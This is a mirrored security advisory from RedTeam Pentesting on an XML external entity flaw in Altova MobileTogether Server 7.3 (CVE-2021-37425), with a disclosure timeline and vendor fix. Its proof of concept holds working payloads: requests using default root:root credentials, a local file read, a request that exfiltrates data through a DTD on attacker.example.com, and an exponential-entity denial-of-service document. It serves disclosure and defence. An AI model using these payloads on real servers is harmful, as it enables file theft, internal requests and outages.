扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 |
# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE) # Date: 2021-08-10 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://www.altova.com/mobiletogether-server # Version: 7.3 # CVE: 2021-37425 Advisory: XML External Entity Expansion in MobileTogether Server RedTeam Pentesting discovered a vulnerability in the MobileTogether server which allows users with access to at least one app to read arbitrary, non-binary files from the file system and perform server-side requests. The vulnerability can also be used to deny availability of the system. As an example, this advisory shows the compromise of the server's certificate and private key. Details ======= Product: MobileTogether Server Affected Versions: 7.0-7.3, potentially earlier versions as well Fixed Versions: 7.3 SP1 Vulnerability Type: XML External and Exponential Entity Expansion Security Risk: medium Vendor URL: https://www.altova.com/mobiletogether-server Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002 Advisory Status: published CVE: CVE-2021-37425 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425 Introduction ============ "MobileTogether Server is the processing powerhouse for your native iOS, Android, Windows, and browser-based apps. MobileTogether Server is the back-end hub for your solutions and acts as a gateway between end-users and your back-end data sources and infrastructure." (from the vendor's homepage) More Details ============ MobileTogether Server is a back-end application hosting developed apps and provide access to various platforms and devices. Access to these apps is possible via native applications for devices and operating systems or directly via the browser. To access the MobileTogether server, depending on configuration either an anonymous login is possible or credentials are required. During analysis of the communication between a MobileTogether client application on a smartphone and the MobileTogether Server, HTTP requests were observed containing JSON as well as XML data. Generally, the XML data is used to signal changes in the UI or user-supplied input for the app hosted in MobileTogether Server. It was found that user-supplied XML external entities included in the described HTTP requests are resolved by the MobileTogether Server and the result is reflected in an HTTP response. This behaviour allows to read local files, perform server-side requests and also deny the availability of the service through XML exponential entity expansion. However, file disclosure is limited to non-binary files and the absolute path needs to be known in advance. Proof of Concept ================ MobileTogether Server comes with a series of example applications. To exploit the vulnerability, access to at least one application is required. In the following, the app EuroFXrates and the default user root with the default password root is used for demonstration of the vulnerability. The following HTTP request contains the minimal data required to be accepted by the server resulting in the processing of the XML data stored within the JSON field InfoSetChanges/Changes (formatted for better readability): ------------------------------------------------------------------------ POST /workflowmanagement HTTP/1.1 Authorization: Basic cm9vdDpyb290 Content-Type: application/json Content-Length: 851 Host: 192.168.1.1:8085 Connection: close { "DeviceY": 0, "ClientVersionName": "7.2.2", "MobileManufacturer": "", "AllInfosetsSerialized": true, "ServerName": "192.168.1.1", "ProtocolVersionMax": "2", "Language": "en-US", "DeviceType": "", "ClientKey": "1_11148009037086584903_2744738433663963458", "DeviceXDPI": 0, "DeviceYDPI": 0, "DeviceYCanvasWithTabs": 0, "ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}", "ProtocolVersionMin": "2", "DeviceXCanvas": 0, "ClientArchiveVersionMin": "-74", "MobileOSVersion": "Android 11", "DeviceXCanvasWithTabs": 0, "ClientArchiveVersionMax": "65", "User": "root", "DeviceX": 0, "DesignFileName": "/public/EuroFXrates", "EncValue": "M9EBc6-7P5cd0", "DeviceYCanvas": 0, "MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412", "InfosetChanges": [ { "Changes": [ { "": "<?xml version=\"1.0\" encoding=\"utf-8\"?> <Root> <SkipIntro>false</SkipIntro> </Root>" } ], "ID": "$$PERS$$" } ], "DeviceIsPortrait": true } ------------------------------------------------------------------------ With the following XML data it can be verified that XML entities are resolved and reflected within predefined XML tags in the HTTP response: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE Root [ <!ENTITY redteam "RedTeam Pentesting"> ]> <Root> <RedTeam>&redteam;</RedTeam> </Root> ------------------------------------------------------------------------ The HTTP response contains the resolved XML entity: ------------------------------------------------------------------------ HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: CherryPy/18.1.0 [...] [...] <?xml version=\"1.0\" encoding=\"utf-8\"?> <Root> <RedTeam>RedTeam Pentesting</RedTeam> [...] ------------------------------------------------------------------------ The following example shows how local files can be read from the server system hosting the MobileTogether Server on a Windows system: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE Root [ <!ENTITY redteam SYSTEM "file://c:/windows/win.ini"> ]> <Root> <RedTeam>&redteam;</RedTeam> </Root> ------------------------------------------------------------------------ The content of the file is shown below and formatted for better readability: ------------------------------------------------------------------------ HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: CherryPy/18.1.0 [...] [...] <?xml version=\"1.0\" encoding=\"utf-8\"?> <Root> <RedTeam> ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 </RedTeam> [...] ------------------------------------------------------------------------ One interesting target for attackers could be the configuration file for the MobileTogether Server residing at the following fixed location: ------------------------------------------------------------------------ C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg ------------------------------------------------------------------------ For example, if the server supports HTTPS, the absolute path to the server's certificate and private key is stored in its configuration. Furthermore, external XML entities can be used to access third-party websites as well as web services that are only available internally. Together with an externally hosted XML DTD, response information can be extracted: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % start "<![CDATA["> <!ENTITY % content SYSTEM "http://internal.example.com"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml"> % dtd; ]> <Root> <RedTeam>&redteam;</RedTeam> </Root> ------------------------------------------------------------------------ The DTD contains the following information: ------------------------------------------------------------------------ <!ENTITY redteam "%start;%content;%end;"> ------------------------------------------------------------------------ In the HTTP response, the HTML markup delivered by internal.example.com is now visible. A further vulnerability attacks the availability of the service through XML exponential entity expansion. This is demonstrated with the following XML document: ------------------------------------------------------------------------ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY redteam0 "RedTeam Pentesting"> <!ENTITY redteam1 "&redteam0; &redteam0;"> <!ENTITY redteam2 "&redteam1; &redteam1;"> <!ENTITY redteam3 "&redteam2; &redteam2;"> <!ENTITY redteam4 "&redteam3; &redteam3;"> <!ENTITY redteam5 "&redteam4; &redteam4;"> <!ENTITY redteam6 "&redteam5; &redteam5;"> <!ENTITY redteam7 "&redteam6; &redteam6;"> <!ENTITY redteam8 "&redteam7; &redteam7;"> <!ENTITY redteam9 "&redteam8; &redteam8;"> <!ENTITY redteam10 "&redteam9; &redteam9;"> <!ENTITY redteam11 "&redteam10; &redteam10;"> <!ENTITY redteam12 "&redteam11; &redteam11;"> <!ENTITY redteam13 "&redteam12; &redteam12;"> <!ENTITY redteam14 "&redteam13; &redteam13;"> <!ENTITY redteam15 "&redteam14; &redteam14;"> <!ENTITY redteam16 "&redteam15; &redteam15;"> <!ENTITY redteam17 "&redteam16; &redteam16;"> <!ENTITY redteam18 "&redteam17; &redteam17;"> <!ENTITY redteam19 "&redteam18; &redteam18;"> <!ENTITY redteam20 "&redteam19; &redteam19;"> ]> <Root> <RedTeam>&redteam20;</RedTeam> </Root> ------------------------------------------------------------------------ Sending the shown XML document leads to a huge server-side resource allocation which ultimately disrupts the availability of the MobileTogether Server. Workaround ========== None known. Fix === According to the vendor, upgrading to version 7.3 SP1 resolves the vulnerability. Security Risk ============= Attackers in possession of an account for a MobileTogether Server with access to at least one app are able to read files from the server system, conduct HTTP requests to external and internal systems and can also deny the availability of the service. Access might also be possible through default credentials or the anonymous user. Timeline ======== 2021-06-21 Vulnerability identified 2021-06-23 Requested a security contact from vendor 2021-06-25 Security contact established with vendor 2021-07-05 Customer approved disclosure to vendor 2021-07-05 Vendor notified 2021-07-20 Vendor acknowledged vulnerability 2021-07-22 CVE ID requested 2021-07-23 CVE ID assigned 2021-07-28 Vendor released fixed version 2021-08-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen |
体验盒子
